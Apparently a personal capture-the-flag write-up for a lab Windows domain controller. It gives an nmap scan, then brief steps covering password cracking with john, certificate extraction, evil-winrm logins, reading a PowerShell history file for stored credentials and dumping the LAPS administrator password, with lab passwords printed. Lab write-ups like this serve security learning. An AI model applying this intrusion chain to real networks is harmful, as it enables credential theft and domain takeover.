53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49729,57404
# Nmap 7.94SVN scan initiated Tue Jan 2 15:27:13 2024 as: nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49729,57404 -oA nmap/detail 10.10.11.152 Nmap scan report for 10.10.11.152 (10.10.11.152) Host is up (0.096s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-02 15:27:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 | tls-alpn: |_ http/1.1 |_http-title: Not Found |_ssl-date: 2024-01-02T15:28:57+00:00; +8h00m00s from scanner time. | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49729/tcp open msrpc Microsoft Windows RPC 57404/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (89%) Aggressive OS guesses: Microsoft Windows Server 2019 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2024-01-02T15:28:19 |_ start_date: N/A |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jan 2 15:29:00 2024 -- 1 IP address (1 host up) scanned in 108.03 seconds
dc01.timelapse.htb timelapse.htb
get zip files with password from smb, then use john to crack
then unzip, get a .pfx file
googling
requiring another password
pfx2john legacyy_dev_auth.pfx > pfxhash
continue cracking, then get
thuglegacy (legacyy_dev_auth.pfx)
googling
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.pem openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt openssl rsa -in private.pem -out private2.pem
evil-winrm -i timelapse.htb -S -k private2.pem -c cert.crt
logged as legacyy
type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
evil-winrm -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -i 10.10.11.152 -S
svc_deploy is able to read LAPS
Get-ADComputer DC01 -property 'ms-mcs-admpwd'
Get-ADComputer DC01 -property *
evil-winrm -u administrator -p '2,uA]7+o3x785.&Ko[1Eh34(' -S -i 10.10.11.152
success!